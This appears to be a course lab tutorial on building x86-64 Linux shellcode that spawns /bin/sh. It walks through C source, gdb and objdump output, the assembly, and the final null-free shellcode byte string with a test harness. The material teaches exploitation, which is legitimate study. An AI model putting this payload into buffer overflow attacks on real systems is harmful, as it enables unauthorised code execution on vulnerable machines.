Shellcode

Introduction

Shellcode is used in buffer overflow attacks. It is simply binary machine instructions in string format. In general, shellcode is difficult to create, but extremely easy to find. This tutorial explains how to create shellcode.

The ideas in this tutorial are taken from Aleph1's Smashing the stack for fun and profit. They have been rewritten to expand the explanations and to work on modern systems (specifically 64-bit Linux kernels).

While this kind of attack is not usually possible anymore on modern computers, it is still often possible on embedded systems and IoT devices.

Executing a shell

The first task is to build a C program that will execute a shell. It should be as simple as possible. Here is a very simple C program that does just that:

// shellcode.c
#include <unistd.h>
int main() { 
   char *array[2];
   array[0] = "/bin/sh";
   array[1] = NULL;
   execve(array[0], array, NULL);
   return 0;
}

Compile it and make sure that it works correctly. Note that it is compiled statically (-static). This is important for some of the next steps.

root:~# gcc -static -o shellcode shellcode.c

It works just as expected. Now the program needs to be disassembled. In order to disassemble the execve function, it needed to be compiled into the program. That is why the -static flag was necessary previously. gdb is used to disassemble the important functions.

root:~# gdb shellcode
(gdb) disass main
Dump of assembler code for function main:
0x0000000000401b8d <+0>:     push   %rbp
0x0000000000401b8e <+1>:     mov    %rsp,%rbp
0x0000000000401b91 <+4>:     sub    $0x10,%rsp
0x0000000000401b95 <+8>:     lea    0x7b468(%rip),%rax        # 0x47d004
0x0000000000401b9c <+15>:    mov    %rax,-0x10(%rbp)
0x0000000000401ba0 <+19>:    movq   $0x0,-0x8(%rbp)
0x0000000000401ba8 <+27>:    mov    -0x10(%rbp),%rax
0x0000000000401bac <+31>:    lea    -0x10(%rbp),%rcx
0x0000000000401bb0 <+35>:    mov    $0x0,%edx
0x0000000000401bb5 <+40>:    mov    %rcx,%rsi
0x0000000000401bb8 <+43>:    mov    %rax,%rdi
0x0000000000401bbb <+46>:    callq  0x43c700 <execve>
0x0000000000401bc0 <+51>:    mov    $0x0,%eax
0x0000000000401bc5 <+56>:    leaveq 
0x0000000000401bc6 <+57>:    retq   
End of assembler dump.
(gdb) disass execve
Dump of assembler code for function execve:
0x000000000043c700 <+0>:     mov    $0x3b,%eax
0x000000000043c705 <+5>:     syscall 
0x000000000043c707 <+7>:     cmp    $0xfffffffffffff001,%rax
0x000000000043c70d <+13>:    jae    0x43c710 <execve+16>
0x000000000043c70f <+15>:    retq   
0x000000000043c710 <+16>:    mov    $0xffffffffffffffc0,%rcx
0x000000000043c717 <+23>:    neg    %eax
0x000000000043c719 <+25>:    mov    %eax,%fs:(%rcx)
0x000000000043c71c <+28>:    or     $0xffffffffffffffff,%rax
0x000000000043c720 <+32>:    retq 
End of assembler dump.
(gdb) quit

What's actually going on here? The following table explains what different sets of instructions are doing.

The syscall numbers that appear in it can be looked up at https://filippo.io/linux-syscall-table/

| Explanation | Instructions |
|---|---|
| Set up the main function | push %rbp; mov %rsp,%rbp; sub $0x10,%rsp |
| Evaluate and move the address of the string /bin/sh onto the stack | lea 0x7b468(%rip),%rax; mov %rax,-0x10(%rbp) |
| Zero the memory after the address of the string. This is required because the execve syscall needs a null-terminated array for its argv parameter. | movq $0x0,-0x8(%rbp) |
| Move the address of the /bin/sh string into rax | mov -0x10(%rbp),%rax |
| Store the address of the address of /bin/sh in rcx (remember that the argv parameter consumes an array of pointers, so that is what this is) | lea -0x10(%rbp),%rcx |
| Set edx to zero, since we don't use the third parameter of execve (null will disable it) | mov $0x0,%edx |
| Rearrange the values to observe the calling convention of x86-64 Linux | mov %rcx,%rsi; mov %rax,%rdi |
| The call to our static execve function | callq 0x43c700 <execve> |
| Complete main and return 0 | mov $0x0,%eax; leaveq; retq |

With the knowledge of what is happening in main, it's possible to figure out what's within the execve function.

| Explanation | Instructions |
|---|---|
| Set the syscall id for execve | mov $0x3b,%eax |
| The arguments for the syscall are already in place, because the calling convention from main to execve is almost the same as the one for the syscall itself. Therefore, we can simply perform the syscall now. | syscall |
| This part is irrelevant when execve succeeds, because the syscall then never returns (execution of /bin/sh begins instead). It only runs on failure, where it stores the error code in errno and returns -1. | cmp $0xfffffffffffff001,%rax; jae 0x43c710 <execve+16>; retq; mov $0xffffffffffffffc0,%rcx; neg %eax; mov %eax,%fs:(%rcx); or $0xffffffffffffffff,%rax; retq |

There are a lot of instructions here. Needless to say, not all of them are needed. The shorter the shellcode is, the more robust it is.

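First, the following things must exist in memory:

  1. The null-terminated string /bin/sh
  2. The address of the string /bin/sh, followed by an eight-byte NULL

Then all that needs to be done is:

  1. Put the address of the string in rdi
  2. Put the address of the address of the string in rsi
  3. Put a NULL in rdx
  4. Put 0x3b in rax
  5. Execute the syscall instruction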

If the execve call fails, though, the program should exit cleanly. To do this, a call to exit can be added to the end of the shellcode. It's not too much extra trouble.

Exiting a program is actually very simple. Simply pass an exit code using the calling convention and use syscall 0x3c. On Linux (and many other systems), an exit code of 0 indicates that a program completed without an error.

Compiling the assembly instructions

Now that the basics of what needs to be done have been figured out, it's time to put it all together. With /bin/sh in memory, here's what needs to be done:

  1. Put the address of /bin/sh in rdi
  2. Ensure /bin/sh is null terminated with a '\0'
  3. Put the address of /bin/sh in array[0]
  4. Put an eight-byte NULL in array[1]
  5. Put the address of the array into rsi
  6. Put a NULL into rdx
  7. Put 0x3b in rax
  8. Call syscall
  9. Store 0x0 in rdi
  10. Store 0x3c in rax
  11. Call syscall

This roughly translates to:

???? %rdi                        # get string into rdi
movb $0x0, string-end(%rdi)      # null terminate string
movq %rdi, array-0-offset(%rdi)  # store address of string
movq $0x0, array-1-offset(%rdi)  # null terminate array
movq $0x0, %rdx                  # put a null in rdx
leaq array-0-offset(%rdi), %rsi  # put array address in rsi
movq $0x3b, %rax                 # set syscall number for execve
syscall                          # do the syscall execve
movq $0x0, %rdi                  # set exit status of 0
movq $0x3c, %rax                 # set syscall number for exit
syscall                          # do the syscall exit
.string "/bin/sh"

This is all well and good, but the address of the /bin/sh string isn't known. The shellcode could end up anywhere in memory, and there is no way of knowing where ahead of time. On x86-32, the usual trick was to use the call instruction, which pushes the address of the next instruction onto the stack, and then pop that address into a register. That trick still works on x86-64, but the 64-bit instruction set also allows a new, more direct way of obtaining addresses. You may be familiar with the instruction pointer, rip, which holds the address of the next instruction to be executed. While rip cannot be read or written like a general-purpose register, it can be used as a base address in the lea instruction.

lea  (%rip), %rdi                # (7) load rip, the address of the next instruction
addq inst-offset, %rdi           # (4) add the offset to calculate the address of "/bin/sh"
movb $0x0, string-len(%rdi)      # (4) null terminate string
movq %rdi, array-0-offset(%rdi)  # (4) store address of string
movq $0x0, array-1-offset(%rdi)  # (8) null terminate array
movq $0x0, %rdx                  # (7) put a null in rdx
leaq array-0-offset(%rdi), %rsi  # (4) put array in rsi
movq $0x3b, %rax                 # (7) set syscall number for execve
syscall                          # (2) do the syscall execve
movq $0x0, %rdi                  # (7) set exit status of 0
movq $0x3c, %rax                 # (7) set syscall number for exit
syscall                          # (2) do the syscall exit
.string "/bin/sh"

The number of bytes for each instruction has been included in the above instructions.

This is pretty much the final assembly code, but the offsets still need to be determined. To know what the offsets are, a memory location for the array has to be chosen. Since the program won't be executing any other instructions, any writable memory location within the program's address space will work. A good place for it is just after the /bin/sh string.

Indicating the 8 byte address of /bin/sh with addr and the 8 byte address of a NULL with null, the goal is to lay out the memory like this:

/bin/sh\0[addr][null]

For clarity, the (approximate) C equivalent of what's happening is this:

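#define STRING_LEN     7   /* length of "/bin/sh" */
#define ARRAY_0_OFFSET 8   /* where [addr] is stored */
#define ARRAY_1_OFFSET 16  /* where [null] is stored */

/* 24 bytes: 8 for the string, 8 for [addr], 8 for [null] */
char string[24] = "/bin/sh";

char *null_terminator = string + STRING_LEN;
long *string_addr = (long *)(string + ARRAY_0_OFFSET);
long *null_addr = (long *)(string + ARRAY_1_OFFSET);

*null_terminator = '\0';
*string_addr = (long)string;
*null_addr = 0;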

To resolve the instruction offset, count the number of bytes from the end of the lea instruction to the beginning of /bin/sh. It is 56, so the instruction becomes addq $56, %rdi. A main label and a .globl directive are also added so that the program assembles correctly. You may wonder why the separate instruction offset exists at all. It is only here for clarity, and to make the code easier to modify by hand. You could instead fold the offset into the other constants, or into the displacement of the lea instruction, and the shellcode would still work. Folding it into the lea would cause trouble later, though, because a small positive displacement is encoded with null bytes. This example keeps the separate addq.

main:
lea  (%rip), %rdi                # (7) load rip, the address of the next instruction
addq $56, %rdi                   # (4) add the offset to calculate the address of "/bin/sh"
movb $0x0, 0x7(%rdi)             # (4) null terminate string
movq %rdi, 0x8(%rdi)             # (4) store address of string
movq $0x0, 0x10(%rdi)            # (8) null terminate array
movq $0x0, %rdx                  # (7) put a null in rdx
leaq 0x8(%rdi), %rsi             # (4) put array in rsi
movq $0x3b, %rax                 # (7) set syscall number for execve
syscall                          # (2) do the syscall execve
movq $0x0, %rdi                  # (7) set exit status of 0
movq $0x3c, %rax                 # (7) set syscall number for exit
syscall                          # (2) do the syscall exit
.string "/bin/sh"
.globl main

The assembly above is easy to build with gcc. Just put it in a file with a .s extension, and gcc knows that it contains assembly instructions. The added main label and .globl directive define a main function so that the program links properly.

root:~# gcc -g -o shellcode shellcode.s

Disassembling the program in gdb will ensure gcc didn't change anything.

root:~# gdb shellcode
(gdb) disass main
Dump of assembler code for function main:
0x0000000000001125 <+0>:     lea    0x0(%rip),%rdi        # 0x112c <main+7>
0x000000000000112c <+7>:     add    $0x38,%rdi
0x0000000000001130 <+11>:    movb   $0x0,0x7(%rdi)
0x0000000000001134 <+15>:    mov    %rdi,0x8(%rdi)
0x0000000000001138 <+19>:    movq   $0x0,0x10(%rdi)
0x0000000000001140 <+27>:    mov    $0x0,%rdx
0x0000000000001147 <+34>:    lea    0x8(%rdi),%rsi
0x000000000000114b <+38>:    mov    $0x3b,%rax
0x0000000000001152 <+45>:    syscall 
0x0000000000001154 <+47>:    mov    $0x0,%rdi
0x000000000000115b <+54>:    mov    $0x3c,%rax
0x0000000000001162 <+61>:    syscall 
0x0000000000001164 <+63>:    (bad)  
0x0000000000001165 <+64>:    (bad)  
0x0000000000001166 <+65>:    imul   $0xf006873,0x2f(%rsi),%ebp
0x000000000000116d <+72>:    (bad)  
0x000000000000116e <+73>:    add    %al,0x57(%rcx)

It looks fine, but if you try to run this program, it will segfault. The reason is that the program modifies itself. When compiled this way, the instructions (as well as the string) are in the text/code section of the program. Modern kernels mark this section as read-only. When the program tries to write a null byte at the end of /bin/sh, it crashes.

That's okay, because when the shellcode is actually used it will be executing on the stack, which is writable. To quickly prepare it for the stack, objdump can print the raw bytes of each instruction.

root:~# objdump -d shellcode | grep -A20 '<main>:'
0000000000001125 <main>:
1125:       48 8d 3d 00 00 00 00    lea    0x0(%rip),%rdi        # 112c <main+0x7>
112c:       48 83 c7 38             add    $0x38,%rdi
1130:       c6 47 07 00             movb   $0x0,0x7(%rdi)
1134:       48 89 7f 08             mov    %rdi,0x8(%rdi)
1138:       48 c7 47 10 00 00 00    movq   $0x0,0x10(%rdi)
113f:       00 
1140:       48 c7 c2 00 00 00 00    mov    $0x0,%rdx
1147:       48 8d 77 08             lea    0x8(%rdi),%rsi
114b:       48 c7 c0 3b 00 00 00    mov    $0x3b,%rax
1152:       0f 05                   syscall 
1154:       48 c7 c7 00 00 00 00    mov    $0x0,%rdi
115b:       48 c7 c0 3c 00 00 00    mov    $0x3c,%rax
1162:       0f 05                   syscall 
1164:       2f                      (bad)  
1165:       62                      (bad)  
1166:       69 6e 2f 73 68 00 0f    imul   $0xf006873,0x2f(%rsi),%ebp
116d:       1f                      (bad)  
116e:       40                      rex

Everything up through the final syscall is a normal instruction. The bytes after it are the string /bin/sh, which objdump has tried to decode as instructions. In the shellcode they can simply be written as the literal string /bin/sh. The shellcode can be tested in a simple program.

char shellcode[] =
  "\x48\x8d\x3d\x00\x00\x00\x00\x48\x83\xc7\x38\xc6\x47\x07\x00\x48\x89\x7f\x08\x48\xc7\x47\x10\x00\x00\x00\x00\x48\xc7\xc2\x00\x00\x00\x00\x48\x8d\x77\x08\x48\xc7\xc0\x3b\x00\x00\x00\x0f\x05\x48\xc7\xc7\x00\x00\x00\x00\x48\xc7\xc0\x3c\x00\x00\x00\x0f\x05/bin/sh";

void shell() {
  long* ret; 
  ret = (long*)&ret + 2;
  (*ret) = (long)shellcode;
}

int main() { 
   shell();
   return 0;
}

Now just compile (allowing the stack to be executable) and run:

root:~# gcc -g -z execstack -fno-stack-protector -o shellcode shellcode.c
root:~# ./shellcode
# exit
root:~#

It works properly. You should run this executable in gdb and step through each line of assembly to confirm your understanding of what is happening.

Removing null characters

Many buffer overflow exploits rely on functions that read strings until reaching a null character. If there are any null characters in the shellcode, the function will stop reading at the first one, and not all of the shellcode will make its way into the program. It's actually pretty simple to replace instructions that contain null characters. The following table includes instructions that cause problems and their replacements.

| Problem | Replacement |
|---|---|
| leaq 0x0(%rip),%rdi | leaq -0x1(%rip),%rdi (add one to the instruction offset to compensate for this) |
| movb $0x0, 0x7(%rdi); movq $0x0, 0x10(%rdi); movq $0x0, %rdx | xorq %rax, %rax; movb %al, 0x7(%rdi); movq %rax, 0x10(%rdi); movq %rax, %rdx |
| movq $0x3b, %rax; movq $0x3c, %rax | xorq %rax, %rax; addb $0x3b, %al (or $0x3c) |
| movq $0x0, %rdi | xorq %rdi, %rdi |

The assembly instructions now become:

main:
leaq    -0x1(%rip), %rdi
addq    $0x28, %rdi
xorq    %rax, %rax
movb    %al, 0x7(%rdi)
movq    %rdi, 0x8(%rdi)
movq    %rax, 0x10(%rdi)
movq    %rax, %rdx
leaq    0x8(%rdi), %rsi
addb    $0x3b, %al
syscall 
xorq    %rdi, %rdi
xorq    %rax, %rax
addb    $0x3c, %al
syscall 
.string "/bin/sh"
.globl main

Note that the instruction offset has changed, since the instructions between the lea and the string were modified. Assembling this and using objdump results in the following:

root:~# gcc -g -o shellcode shellcode.s
root:~# objdump -d shellcode | grep -A20 '<main>:'
0000000000001125 <main>:
1125:       48 8d 3d ff ff ff ff    lea    -0x1(%rip),%rdi        # 112b <main+0x6>
112c:       48 83 c7 28             add    $0x28,%rdi
1130:       48 31 c0                xor    %rax,%rax
1133:       88 47 07                mov    %al,0x7(%rdi)
1136:       48 89 7f 08             mov    %rdi,0x8(%rdi)
113a:       48 89 47 10             mov    %rax,0x10(%rdi)
113e:       48 89 c2                mov    %rax,%rdx
1141:       48 8d 77 08             lea    0x8(%rdi),%rsi
1145:       04 3b                   add    $0x3b,%al
1147:       0f 05                   syscall 
1149:       48 31 ff                xor    %rdi,%rdi
114c:       48 31 c0                xor    %rax,%rax
114f:       04 3c                   add    $0x3c,%al
1151:       0f 05                   syscall 
1153:       2f                      (bad)  
1154:       62                      (bad)  
1155:       69 6e 2f 73 68 00 0f    imul   $0xf006873,0x2f(%rsi),%ebp

As expected, all of the nulls have been removed from the instructions (the only 00 byte left is the terminator that .string appends after /bin/sh), so we can update our shellcode:

char shellcode[] = 
  "\x48\x8d\x3d\xff\xff\xff\xff\x48\x83\xc7\x28\x48\x31\xc0\x88\x47\x07\x48\x89\x7f\x08\x48\x89\x47\x10\x48\x89\xc2\x48\x8d\x77\x08\x04\x3b\x0f\x05\x48\x31\xff\x48\x31\xc0\x04\x3c\x0f\x05/bin/sh";

Compiling it and running it in the previous shellcode.c program shows that the shellcode works, and now it has no null characters.

root:~# gcc -g -z execstack -fno-stack-protector -o shellcode shellcode.c
root:~# ./shellcode
$ exit
root:~#

Using the shellcode

Shellcode is used in buffer overflow attacks. To learn more about how to use the shellcode, read about buffer overflows.

Classwork

For submission, run some commands after you get the shell from executing the program and take a screenshot.

NOTE: You may find that this lab is very easy to complete by copying the steps shown above. While that is sufficient to get credit right now, you will find that you won't have learned the skills required to do subsequent assignments effectively. Unless you have an unusual schedule, it is better for you to spend the time required to understand this concept now rather than later.

As an optional challenge to test your understanding, try modifying this shellcode so that it does not null-terminate the string dynamically and instead relies on the null terminator implicitly provided by C.